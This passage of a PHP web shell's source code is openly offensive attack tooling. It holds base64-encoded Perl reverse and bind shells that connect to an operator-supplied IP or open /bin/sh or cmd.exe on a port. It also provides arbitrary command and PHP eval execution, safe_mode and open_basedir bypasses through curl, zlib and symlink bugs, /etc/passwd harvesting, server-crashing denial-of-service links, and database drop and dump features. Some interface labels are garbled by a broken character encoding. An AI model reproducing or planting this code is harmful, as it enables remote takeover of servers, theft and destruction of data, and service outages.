536IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
537ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
538$opbc=fopen("bcc.pl","w");
539fwrite($opbc,base64_decode($bcperl));
540fclose($opbc);
541system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For ����shell Disable_functions Or Safe Mode");
542}
543function wbp($wb){
544$wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
545cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
546a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
547ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
548IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
549IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
550VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
551VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
552$opwb=fopen("wbp.pl","w");
553fwrite($opwb,base64_decode($wbp));
554fclose($opwb);
555echo getcwd();
556system("perl wbp.pl $wb") or die("I Can Not Execute Command For ����shell Disable_functions Or Safe Mode");
557}
558function lbp($wb){
559$lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
560YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
561U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
562VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
563QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
564dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
565b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
566Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
567$oplb=fopen("lbp.pl","w");
568fwrite($oplb,base64_decode($lbp));
569fclose($oplb);
570system("perl lbp.pl $wb") or die("I Can Not Execute Command For ����shell Disable_functions Or Safe Mode");
571}
572
573if($_REQUEST['portbw']){
574wbp($_REQUEST['portbw']);
575
576}if($_REQUEST['portbl']){
577lbp($_REQUEST['portbl']);
578}
579if($_REQUEST['ipcb'] && $_REQUEST['portbc']){
580bcn($_REQUEST['ipcb'],$_REQUEST['portbc']);
581
582}
583
584if($_REQUEST['do']=="bc"){
585echo $head.$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< ����shell >>>>>><br>Ip Address : <input name=ipcb value=".$_SERVER['REMOTE_ADDR'] ."> Port : <input name=portbc value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Windows Bind Port >>>>>><br>Port : <input name=portbw value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Linux Bind Port >>>>>><br>Port : <input name=portbl value=5555><br><input type=submit value=Connect></form>".$end;exit;
586
587}
588function copyf($file1,$file2,$filename){
589global $slash;
590$fpc = fopen($file1, "rb");
591$source = '';
592while (!feof($fpc)) {
593$source .= fread($fpc, 8192);
594}
595fclose($fpc);
596$opt = fopen($file2.$slash.$filename, "w");
597fwrite($opt, $source);
598fclose($opt);
599}
600if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){
601if(is_writable($_REQUEST['cpyto'])){
602echo $_REQUEST['address'];
603copyf($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto'],$_REQUEST['copyname']);
604}else{alert("Permission Denied !");}}
605if($_REQUEST['cfilename']){
606
607echo $head.$formp.$nowaddress.'<p align="center"><b>Create File</b><br><textarea rows="19" name="nf4cs" cols="87"></textarea><br><input value="'.$_REQUEST['cfilename'].'" name=nf4c size=50><br><input type=submit value=" Create "></form>'.$end;exit;
608}
609
610if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){
611if($ofile4c=fopen($_REQUEST['nf4c'],"w")){
612fwrite($ofile4c,$_REQUEST['nf4cs']);
613fclose($ofile4c);
614alert("File Saved !");}else{alert("Permission Denied !");}}
615
616function sqlclienT(){
617global $t,$errorbox,$et,$hcwd;
618if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
619$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
620$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];
621$_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUEST['useR'];
622
623}
624
625if (isset ($_GET[select_db])){
626 $getdb=$_GET[select_db];
627 $_SESSION[db]=$getdb;
628 $query="SHOW TABLES";
629 $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
630}
631elseif (isset ($_GET[select_tbl])){
632 $tbl=$_GET[select_tbl];
633 $_SESSION[tbl]=$tbl;
634 $query="SELECT * FROM `$tbl`";
635 $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
636}
637elseif (isset ($_GET[drop_db])){
638 $getdb=$_GET[drop_db];
639 $_SESSION[db]=$getdb;
640 $query="DROP DATABASE `$getdb`";
641 querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'',$query);
642 $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'','SHOW DATABASES');
643}
644elseif (isset ($_GET[drop_tbl])){
645 $getbl=$_GET[drop_tbl];
646 $query="DROP TABLE `$getbl`";
647 querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
648 $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],'SHOW TABLES');
649}
650elseif (isset ($_GET[drop_row])){
651 $getrow=$_GET[drop_row];
652 $getclm=$_GET[clm];
653 $query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'";
654 $tbl=$_SESSION[tbl];
655 querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
656 $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`");
657}
658else
659 $res=querY($type,$server,$user,$pass,$db,$query);
660
661if($res){
662$res=htmlspecialchars($res);
663$row=array ();
664$title=explode('[+][+][+]',$res);
665$trow=explode('[-][-][-]',$title[1]);
666$row=explode('|+|+|+|+|+|',$title[0]);
667$data=array();
668$field=$trow[count($trow)-2];
669if (strstr($trow[0],'Database')!='')
670 $obj='db';
671elseif (substr($trow[0],0,6)=='Tables')
672 $obj='tbl';
673else
674 $obj='row';
675$i=0;
676foreach ($row as $a){
677if($a!='')
678$data[$i++]=explode('|-|-|-|-|-|',$a);
679}
680
681echo "<table border=1 bordercolor='#C6C6C6' cellpadding='2' bgcolor='EAEAEA' width='100%' style='border-collapse: collapse'><tr>";
682foreach ($trow as $ti)
683echo "<td bgcolor='F2F2F2'>$ti</td>";
684echo "</tr>";
685$j=0;
686while ($data[$j]){
687 echo "<tr>";
688 foreach ($data[$j++] as $dr){
689 echo "<td>";
690 if($obj!='row') echo "<a href='$_SERVER[PHP_SELF]?do=db&select_$obj=$dr'>";
691 echo $dr;
692 if($obj!='row') echo "</a>";
693 echo "</td>";
694 }
695 echo "<td><a href='$_SERVER[PHP_SELF]?do=db&drop_$obj=$dr";
696 if($obj=='row')
697 echo "&clm=$field";
698 echo "'>Drop</a></td></tr>";
699}
700echo "</table><br>";
701
702}
703
704
705
706
707
708if(empty($_REQUEST['typE']))$_REQUEST['typE']='';
709echo "<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'><table border='1' width='400' style='border-collapse: collapse' id='table1' bordercolor='#C6C6C6' cellpadding='2'><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Connect to Database</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Type:</font></td><td width='250' bgcolor='#EAEAEA'><select name=typE><option valut=MySQL onClick='document.client.serveR.disabled = false;' ";
710if ($_REQUEST['typE']=='MySQL')echo 'selected';
711echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";
712if ($_REQUEST['typE']=='MSSQL')echo 'selected';
713echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";
714if ($_REQUEST['typE']=='Oracle')echo 'selected';
715echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";
716if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';
717echo ">PostgreSQL</option><option valut=DB2 onClick='document.client.serveR.disabled = false;' ";
718if ($_REQUEST['typE']=='DB2')echo 'selected';
719echo ">IBM DB2</option></select></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Server Address:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
720if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost';
721echo "' name=serveR size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Username:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text name=useR value='";
722if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root';
723echo "' size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Password:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
724if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123';
725echo "' name=pasS size=35></td></tr><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Submit a Query</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Name:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
726if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);
727echo "' name=dB size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Query:</font></td><td width='250' bgcolor='#EAEAEA'><textarea name=querY rows=5 cols=27>";
728if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES';
729echo "</textarea></td></tr><tr><td width='400' colspan='2' bgcolor='#EAEAEA'>$hcwd<input class=buttons type=submit value='Submit' style='float: right'></td></tr></table></form>$et</center>";
730}
731
732
733function querY($type,$host,$user,$pass,$db='',$query){
734$res='';
735switch($type){
736case 'MySQL':
737if(!function_exists('mysql_connect'))return 0;
738$link=mysql_connect($host,$user,$pass);
739if($link){
740if(!empty($db))mysql_select_db($db,$link);
741$result=mysql_query($query,$link);
742if ($result!=1){
743while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
744$res.='[+][+][+]';
745for($i=0;$i<mysql_num_fields($result);$i++)
746$res.=mysql_field_name($result,$i).'[-][-][-]';
747}
748mysql_close($link);
749return $res;
750}
751break;
752case 'MSSQL':
753if(!function_exists('mssql_connect'))return 0;
754$link=mssql_connect($host,$user,$pass);
755if($link){
756if(!empty($db))mssql_select_db($db,$link);
757$result=mssql_query($query,$link);
758while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
759$res.='[+][+][+]';
760for($i=0;$i<mssql_num_fields($result);$i++)
761$res.=mssql_field_name($result,$i).'[-][-][-]';
762mssql_close($link);
763return $res;
764}
765break;
766case 'Oracle':
767if(!function_exists('ocilogon'))return 0;
768$link=ocilogon($user,$pass,$db);
769if($link){
770$stm=ociparse($link,$query);
771ociexecute($stm,OCI_DEFAULT);
772while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
773$res.='[+][+][+]';
774for($i=0;$i<oci_num_fields($stm);$i++)
775$res.=oci_field_name($stm,$i).'[-][-][-]';
776return $res;
777}
778break;
779case 'PostgreSQL':
780if(!function_exists('pg_connect'))return 0;
781$link=pg_connect("host=$host dbname=$db user=$user password=$pass");
782if($link){
783$result=pg_query($link,$query);
784while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
785$res.='[+][+][+]';
786for($i=0;$i<pg_num_fields($result);$i++)
787$res.=pg_field_name($result,$i).'[-][-][-]';
788pg_close($link);
789return $res;
790}
791break;
792case 'DB2':
793if(!function_exists('db2_connect'))return 0;
794$link=db2_connect($db,$user,$pass);
795if($link){
796$result=db2_exec($link,$query);
797while($data=db2_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
798$res.='[+][+][+]';
799for($i=0;$i<db2_num_fields($result);$i++)
800$res.=db2_field_name($result,$i).'[-][-][-]';
801db2_close($link);
802return $res;
803}
804break;
805}
806return 0;
807}
808function bywsym($file){
809if(!function_exists('symlink')){echo "Function Symlink Not Exist";}
810
811if(!is_writable("."))
812 die("not writable directory");
813$level=0;
814for($as=0;$as<$fakedep;$as++){
815 if(!file_exists($fakedir))
816 mkdir($fakedir);
817 chdir($fakedir);
818}
819while(1<$as--) chdir("..");
820$hardstyle = explode("/", $file);
821for($a=0;$a<count($hardstyle);$a++){
822 if(!empty($hardstyle[$a])){
823 if(!file_exists($hardstyle[$a]))
824 mkdir($hardstyle[$a]);
825 chdir($hardstyle[$a]);
826 $as++;
827}}
828$as++;
829while($as--)
830 chdir("..");
831@rmdir("fakesymlink");
832@unlink("fakesymlink");
833@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
834while(1)
835 if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
836 else $num++;
837@unlink("fakesymlink");
838mkdir("fakesymlink");
839}
840function bypcu($file){
841$level=0;
842
843if(!file_exists("file:"))
844 mkdir("file:");
845chdir("file:");
846$level++;
847
848$hardstyle = explode("/", $file);
849
850for($a=0;$a<count($hardstyle);$a++){
851 if(!empty($hardstyle[$a])){
852 if(!file_exists($hardstyle[$a]))
853 mkdir($hardstyle[$a]);
854 chdir($hardstyle[$a]);
855 $level++;
856 }
857}
858
859while($level--) chdir("..");
860
861$ch = curl_init();
862
863curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
864
865echo '<FONT COLOR="RED"> <textarea rows="40" cols="120">';
866
867if(FALSE==curl_exec($ch))
868 die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
869
870echo ' </textarea> </FONT>';
871
872curl_close($ch);
873}
874if ($_REQUEST['bypcu']){
875bypcu($_REQUEST['bypcu']);
876}
877if($_REQUEST['do']=="bypasscmd"){
878if($_POST['bycw']){
879echo $_POST['bycw'];
880$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll');
881 $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw']."");
882 $stdout = $exec->StdOut();
883 $stcom = $stdout->ReadAll();}
884
885echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);} echo $stcom.'</textarea><hr><center>Bypass Safe_Mode And Disable_Functions In Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'<input type=hidden value="bypasscmd" name=do>Command </font></td><td width="750"><input name=bycw size=50><input type=submit value ="eXecute"></form></td></tr></table>Bypass Safe_Mode Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Command </font></td><td width="750"><input name=byws size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypasscmd"></form></td></tr></table>'.$end;exit;;
886}
887if($_REQUEST['do']=="bypassdir"){
888if($_POST['byoc']){
889if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){
890$bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder";
891}else{$bopens="Can Not Bypass This";}
892}
893if($_POST['byfc']){
894curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__);
895$debfc=curl_exec($ch);
896}
897if($_POST['byetc']){
898for($bye=0;$bye<40000;$bye++){
899$sbep =$sbep. posix_getpwuid($bye);
900}}
901if($_POST['byfc9']){
902echo "not sucsfull";
903}
904if($_REQUEST['bysyml']){
905$file=$_REQUEST['bysyml'];
906bywsym($file);
907}
908echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);}if(isset($sbep)){for($fbe=0;$fbe<count($sbep);$fbe++){echo $sbep[$fbe];}} if(isset($debfc)){} echo $bopens.'</textarea><hr><center>Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right">'.$formp.'<input type=hidden value="bypassdir" name=do><font face="Tahoma" style="font-size: 10pt; font-weight:700">Address File </font></td><td width="750"><input name=byoc size=50 ><input type=submit value ="read"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc9 size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass /Etc/Passwd<br>'.$formp.'<input type=submit value ="Read Passwd"><input type=hidden name=byetc value="lol"><input type=hidden name=do value="bypassdir"></form><hr>Bypass With ini_restore'.$formp.'<input type=submit value ="Read File"><input name=rfili value="Pejijon" type=hidden><input type=hidden name=do value="bypassdir"></form><hr>Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bysyml size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"><input name=rfili value="Pejijon" type=hidden></form></td></tr></table><hr>'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bypcu size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"></form></td></tr></table>'.$end;exit;;
909
910
911
912
913}
914function printdrive(){
915global $slash;
916foreach (range("A","Z") as $tempdrive) {
917if (is_dir($tempdrive.":".$slash)){
918$adri=$tempdrive.":".$slash;
919$drivea=$drivea.'<a href="?address='.$adri.'"><font size=1>'.$tempdrive.':'.$slash.' </a></font>';
920}
921}
922return $drivea;
923}
924if($_POST['nameren'] && $_POST['addressren']){
925if(is_writable($_REQUEST['addressren'])){
926
927rename($_POST['addressren'],$_POST['nameren']);alert("Rename Successful !");
928}else{alert("Permission Denied !");}
929}
930if($_GET['do']=="delete"){
931
932if ($_GET['type']=="dir"){
933if(is_writable($_REQUEST['address'])){
934$dir=$_GET['address'].$_GET['filename'];
935deleteDirectory($dir);
936alert("Deleted Successful !");
937}else{alert("Permission Denied !");}
938}elseif($_GET['type']=="file"){
939if(is_writable($_GET['address'].$_GET['filename'])){
940unlink($_GET['address'].$_GET['filename']);alert("Deleted Successful !");
941}else{alert("Permission Denied !");}
942}
943}
944if($_POST['fedit'] && $_POST['namefe']){
945if(is_writable($_REQUEST['address'])){
946
947
948$opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w");
949fwrite($opensave,html_entity_decode($_POST['fedit']));
950fclose($opensave);alert("File Saved Successful !");
951}else{alert("Permission Denied !");}
952}
953if ($_POST['evalsource']){
954
955eval($_POST['evalsource']);
956}
957if($_GET['do']=="eval"){
958echo $head.$formp.$nowaddress.'<p align="center"><textarea rows="19" name="evalsource" cols="87"></textarea><br><input type=submit value=" eXecute "></form></p>'.$end;exit;
959}
960if($_GET['do']=="info"){
961
962if(ini_get('register_globals')){
963$registerg="Enable";
964}else{
965$registerg="disable";
966}
967if(extension_loaded('curl')){
968$curls="Enable";
969}else{
970$curls="disable";
971}
972if(@function_exists('mysql_connect')){
973$db_on = "Mysql : On";
974};
975if(@function_exists('mssql_connect')){
976$db_on = "Mssql : On";
977};
978if(@function_exists('pg_connect')){
979$db_on = "PostgreSQL : On";
980};if(@function_exists('ocilogon')){
981$db_on = "Oracle : On";
982};
983
984echo $head."<font face='Tahoma' size='2'>Operating System : ".php_uname()."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Disable_Functions : ".$disablef."<br>Safe_Mode : ".$safe_modes."<br>Openbase_dir : ".ini_get('openbase_dir')."<br>Php Version : ".phpversion()."<br>Free Space : ".sizee(disk_free_space("/"))."<br>Total Space : ".sizee(disk_total_space("/"))."<br>Register_Globals : ".$registerg."<br>Curl : ".$curls."<br>Database ".$db_on."<br>Server Name : ".$_SERVER['HTTP_HOST']."<br>Admin Server : ".$_SERVER['SERVER_ADMIN'].$end;
985exit;
986}
987if ($_GET['do']=="cmd"){
988echo $head.'
989<form method=get action="'.$me.'">
990<p align="center">
991<textarea rows="19" name="S1" cols="87">';
992if (strlen($_GET['command'])>1 && $_GET['execmethod']!="popen"){
993echo $_GET['execmethod']($_GET['command']);}
994if (strlen($_POST['command'])>1 && $_POST['execmethod']!="popen"){
995echo $_POST['execmethod']($_POST['command']);}
996
997if (strlen($_GET['command'])>1 && $_GET['execmethod']=="popen"){
998popen($_GET['command'],"r");}
999
1000echo'</textarea></p><p align="center">
1001<input type=hidden name="do" size="50" value="cmd"> <input type="text" name="command" size="50"><select name=execmethod>
1002 <option value="system">System</option> <option value="exec">Exec</option> <option value="passthru">Passthru</option><option value="popen">popen</option>
1003</select><input type="submit" value="eXecute">
1004</p></form>'.$end;exit;}
1005if ($_GET['do']=="symlink"){
1006echo $head.'
1007<form method=post action="'.$me.'">
1008<p align="center">
1009SymLink With PHP<br><input name=ad1syp size=50> TO <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syp size=50><br><input type=submit value=SymLink!><hr><p align="center"></form>
1010<form method=post action="'.$me.'"><p align="center">
1011
1012SymLink With OS : <br><input name=ad1syc size=50> TO <input value="'.getcwd().$slash."symlink.txt".'" name=ad2syc size=50><br><input type=submit value=SymLink!>
1013</p></form>'.$end;exit;}
1014if ($_POST['ad1syp'] && $_POST['ad2syp']){
1015if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){
1016alert("Symlink Worked !");
1017}else{
1018alert("Symlink Not Worked !");
1019}}
1020if ($_POST['ad1syc'] && $_POST['ad2syc']){
1021if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){
1022alert("Symlink Worked !");
1023}else{alert("Symlink Not Worked !");}
1024}
1025if ($_GET['do']=="d0slocal"){
1026echo $head.'
1027<p align="center">If You Click This Link This Server Crashed.<br>This Worked In Php 5.3.x : <a href="?dosthisserver=1" target="_blank"><font size=4>Dos This Server I Am Sure </font></a><br>This Worked In Php 4.x.x And 5.2.9 : <a href="?dosthisserver=2" target="_blank"><font size=4>Dos This Server I Am Sure </a>'.$end;exit;}
1028if ($_GET['dosthisserver']=="1"){
1029function dosserver(){
1030$junk=str_repeat("99999999999999999999999999999999999999999999999999",99999);
1031for($i=0;$i<2;){
1032$buff=bcpow($junk, '3', 2);
1033$buff=null;
1034}
1035}
1036dosserver();
1037}
1038if ($_GET['dosthisserver']=="2"){
1039function cx(){cx();}
1040 cx();
1041}
1042if ($_GET['do']=="����ת��"){
1043$hash=null;
1044if ($_GET['stringtoh'] && $_GET['hashtoh']=='md5'){
1045$hash=md5($_GET['stringtoh']);
1046}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='sh1'){
1047$hash=sha1($_GET['stringtoh']);
1048}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='crc32'){
1049$hash=crc32($_GET['stringtoh']);
1050}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64e'){
1051$hash=base64_encode($_GET['stringtoh']);
1052}elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64d'){
1053$hash=base64_decode($_GET['stringtoh']);
1054}
1055echo $head.'
1056<form method=get action="'.$me.'">
1057<p align="center">����ת��<br><input type=hidden name=do value=����ת��>
1058<input name=stringtoh size=58><select name=hashtoh>
1059<option value="md5">MD5</option>
1060<option value="crc32">CRC32</option>
1061<option value="sha1">SHA1</option>
1062<option value="b64e">Base64 Encode!</option>
1063<option value="b64d">Base64 Decode!</option>
1064<br><textarea cols=60 rows=18>'.$hash.'</textarea><br><input type=submit value="����ת��">
1065
1066</p></form>'.$end;exit;}
1067if ($_GET['do']=="dump"){
1068echo $head.'<p align="center">';
1069echo '<table border=1 width=400 style="border-collapse: collapse" bordercolor=#C6C6C6 cellpadding=2><tr><td width=400 colspan=2 bgcolor=#F2F2F2><p align=center><b><font face=Arial size=2 color=#433934>�������ݿ�</font></b></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>DB Type:</font></td><td width=250 bgcolor=#EAEAEA><form method=post action="'.$me.'"><select name=method><option value="gzip">Gzip</option><option value="sql">Sql</option> </select></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Server:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=server size=35></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Username:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=username size=35></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Password:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=password></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>���ݿ���� Name:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=dbname></td></tr><tr><td width=400 colspan=2 bgcolor=#EAEAEA><center><input type=submit value=" Dump! " ></td></tr></table></form></center></table>'.$end;exit;}
1070if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
1071$date = date("Y-m-d");
1072$dbserver = $_POST['server'];
1073$dbuser = $_POST['username'];
1074$dbpass = $_POST['password'];
1075$dbname = $_POST['dbname'];
1076$file = "Dump-$dbname-$date";
1077$method = $_POST['method'];
1078if ($method=='sql'){
1079$file="Dump-$dbname-$date.sql";
1080$fp=fopen($file,"w");
1081}else{
1082$file="Dump-$dbname-$date.sql.gz";
1083$fp = gzopen($file,"w");
1084}
1085function write($data) {
1086global $fp;
1087if ($_POST['method']=='sql'){
1088fwrite($fp,$data);
1089}else{
1090gzwrite($fp, $data);
1091}}
1092mysql_connect ($dbserver, $dbuser, $dbpass);
1093mysql_select_db($dbname);
1094$tables = mysql_query ("SHOW TABLES");
1095while ($i = mysql_fetch_array($tables)) {
1096 $i = $i['Tables_in_'.$dbname];
1097 $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
1098 write($create['Create Table'].";\n\n");
1099 $sql = mysql_query ("SELECT * FROM ".$i);
1100 if (mysql_num_rows($sql)) {
1101 while ($row = mysql_fetch_row($sql)) {
1102 foreach ($row as $j => $k) {
1103 $row[$j] = "'".mysql_escape_string($k)."'";
1104 }
1105 write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
1106 }
1107 }
1108}
1109if ($method=='sql'){
1110fclose ($fp);
1111}else{
